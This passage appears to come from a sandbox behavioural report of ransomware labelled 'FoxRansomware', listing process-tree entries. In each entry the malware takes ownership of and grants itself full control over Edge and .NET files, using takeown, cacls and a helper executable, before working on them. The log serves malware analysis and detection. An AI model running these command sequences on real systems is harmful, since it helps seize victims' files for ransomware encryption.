takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\resources.pak"
3⤵
- Modifies file permissions
PID:5020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "resources.pak" -nobanner
3⤵
PID:6944

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "resources.pak" -nobanner
4⤵
PID:7684

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:5436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\bn-IN.pak""
2⤵
PID:7900

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\bn-IN.pak" /E /G Admin:F /C
3⤵
PID:5920

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\bn-IN.pak"
3⤵
PID:7880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "bn-IN.pak" -nobanner
3⤵
PID:7808

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "bn-IN.pak" -nobanner
4⤵
PID:1408

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:5396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\en-US.pak""
2⤵
PID:7744

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\en-US.pak" /E /G Admin:F /C
3⤵
PID:8088

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\en-US.pak"
3⤵
- Modifies file permissions
PID:8164

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "en-US.pak" -nobanner
3⤵
PID:7144

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "en-US.pak" -nobanner
4⤵
PID:7200

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:8028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\bg.pak.DATA""
2⤵
PID:7952

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\bg.pak.DATA" /E /G Admin:F /C
3⤵
PID:6752

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\bg.pak.DATA"
3⤵
- Modifies file permissions
PID:8048

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "bg.pak.DATA" -nobanner
3⤵
PID:5888

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "bg.pak.DATA" -nobanner
4⤵
PID:6012

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7864

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\en-GB.pak.DATA""
2⤵
PID:6524

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\en-GB.pak.DATA" /E /G Admin:F /C
3⤵
PID:3876

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\en-GB.pak.DATA"
3⤵
PID:6244

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "en-GB.pak.DATA" -nobanner
3⤵
PID:7128

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "en-GB.pak.DATA" -nobanner
4⤵
PID:6504

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedge_100_percent.pak""
2⤵
PID:6548

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedge_100_percent.pak" /E /G Admin:F /C
3⤵
PID:8008

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedge_100_percent.pak"
3⤵
PID:8000

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "msedge_100_percent.pak" -nobanner
3⤵
PID:6356

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "msedge_100_percent.pak" -nobanner
4⤵
PID:6840

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6124

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\msedge_100_percent.pak""
2⤵
PID:7732

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\msedge_100_percent.pak" /E /G Admin:F /C
3⤵
PID:4140

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\msedge_100_percent.pak"
3⤵
PID:6280

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "msedge_100_percent.pak" -nobanner
3⤵
PID:7840

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "msedge_100_percent.pak" -nobanner
4⤵
PID:6632

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\en-US.pak""
2⤵
PID:6972

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\en-US.pak" /E /G Admin:F /C
3⤵
PID:5872

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\en-US.pak"
3⤵
- Modifies file permissions
PID:7240

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "en-US.pak" -nobanner
3⤵
PID:6072

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "en-US.pak" -nobanner
4⤵
PID:6112

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6808

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\identity_proxy\win11\identity_helper.Sparse.Dev.msix""
2⤵
PID:6236

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\identity_proxy\win11\identity_helper.Sparse.Dev.msix" /E /G Admin:F /C
3⤵
PID:5624

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\identity_proxy\win11\identity_helper.Sparse.Dev.msix"
3⤵
PID:6408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "identity_helper.Sparse.Dev.msix" -nobanner
3⤵
PID:4788

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "identity_helper.Sparse.Dev.msix" -nobanner
4⤵
PID:7596

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:4308

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\it.pak""
2⤵
PID:6300

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\it.pak" /E /G Admin:F /C
3⤵
PID:5508

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\it.pak"
3⤵
PID:1196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "it.pak" -nobanner
3⤵
PID:8124

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "it.pak" -nobanner
4⤵
PID:6640

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:280

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\lt.pak""
2⤵
PID:8020

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\lt.pak" /E /G Admin:F /C
3⤵
PID:388

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\lt.pak"
3⤵
- Modifies file permissions
PID:7004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "lt.pak" -nobanner
3⤵
PID:6512

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "lt.pak" -nobanner
4⤵
PID:7112

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6892

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\resources.pak""
2⤵
PID:5276

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1076

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\resources.pak" /E /G Admin:F /C
3⤵
PID:6812

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\resources.pak"
3⤵
PID:6332

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "resources.pak" -nobanner
3⤵
PID:636

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "resources.pak" -nobanner
4⤵
PID:7060

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:2492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\sk.pak""
2⤵
PID:3948

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4768

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\sk.pak" /E /G Admin:F /C
3⤵
PID:6644

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\sk.pak"
3⤵
PID:5808

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "sk.pak" -nobanner
3⤵
PID:6108

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "sk.pak" -nobanner
4⤵
PID:5896

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:2012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\resources.pak.DATA""
2⤵
PID:3436

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\resources.pak.DATA" /E /G Admin:F /C
3⤵
PID:4024

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\resources.pak.DATA"
3⤵
PID:6880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "resources.pak.DATA" -nobanner
3⤵
PID:5244

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "resources.pak.DATA" -nobanner
4⤵
PID:1368

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:5728

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\en-GB.pak""
2⤵
PID:6904

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\en-GB.pak" /E /G Admin:F /C
3⤵
PID:6664

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\en-GB.pak"
3⤵
- Modifies file permissions
PID:5840

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "en-GB.pak" -nobanner
3⤵
PID:7276

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "en-GB.pak" -nobanner
4⤵
PID:4600

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:8116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\lo.pak""
2⤵
PID:5440

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\lo.pak" /E /G Admin:F /C
3⤵
PID:6052

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\lo.pak"
3⤵
PID:6396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "lo.pak" -nobanner
3⤵
PID:4972

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "lo.pak" -nobanner
4⤵
PID:5876

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\tr.pak""
2⤵
PID:32

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\tr.pak" /E /G Admin:F /C
3⤵
PID:7388

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\tr.pak"
3⤵
PID:6916

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "tr.pak" -nobanner
3⤵
PID:7212

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "tr.pak" -nobanner
4⤵
PID:7252

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\ne.pak""
2⤵
PID:7360

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\ne.pak" /E /G Admin:F /C
3⤵
PID:7540

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\ne.pak"
3⤵
PID:7416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "ne.pak" -nobanner
3⤵
PID:7508

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "ne.pak" -nobanner
4⤵
PID:5772

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7372

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\ne.pak""
2⤵
PID:4740

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\ne.pak" /E /G Admin:F /C
3⤵
PID:7484

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\ne.pak"
3⤵
PID:7520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "ne.pak" -nobanner
3⤵
PID:3128

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "ne.pak" -nobanner
4⤵
PID:7624

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\ne.pak.DATA""
2⤵
PID:6456

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\ne.pak.DATA" /E /G Admin:F /C
3⤵
PID:7648

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\ne.pak.DATA"
3⤵
PID:7924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "ne.pak.DATA" -nobanner
3⤵
PID:7800

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "ne.pak.DATA" -nobanner
4⤵
PID:7164

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6368

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\ru.pak.DATA""
2⤵
PID:7636

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:6500

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\ru.pak.DATA" /E /G Admin:F /C
3⤵
PID:4704

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\ru.pak.DATA"
3⤵
PID:7716

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "ru.pak.DATA" -nobanner
3⤵
PID:7936

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "ru.pak.DATA" -nobanner
4⤵
PID:5460

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7684

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\ru.pak.DATA""
2⤵
PID:5436

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\ru.pak.DATA" /E /G Admin:F /C
3⤵
PID:7692

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\ru.pak.DATA"
3⤵
PID:8064

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "ru.pak.DATA" -nobanner
3⤵
PID:7884

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "ru.pak.DATA" -nobanner
4⤵
PID:7504

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\ru.pak""
2⤵
PID:7760

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\ru.pak" /E /G Admin:F /C
3⤵
PID:7788

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\ru.pak"
3⤵
PID:5632

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "ru.pak" -nobanner
3⤵
PID:7552

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "ru.pak" -nobanner
4⤵
PID:8188

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:8180

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\th.pak.DATA""
2⤵
PID:8028

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\th.pak.DATA" /E /G Admin:F /C
3⤵
PID:2256

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\th.pak.DATA"
3⤵
PID:7124

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "th.pak.DATA" -nobanner
3⤵
PID:5308

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "th.pak.DATA" -nobanner
4⤵
PID:3384

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:5836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml""
2⤵
PID:6672

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml" /E /G Admin:F /C
3⤵
PID:6088

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml"
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "AssemblyList_4_client.xml" -nobanner
3⤵
PID:4356

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "AssemblyList_4_client.xml" -nobanner
4⤵
PID:5292

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6200

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\th.pak""
2⤵
PID:7912

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:7656

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\th.pak" /E /G Admin:F /C
3⤵
PID:5300

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\th.pak"
3⤵
- Modifies file permissions
PID:8004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "th.pak" -nobanner
3⤵
PID:3196

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "th.pak" -nobanner
4⤵
PID:8000

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
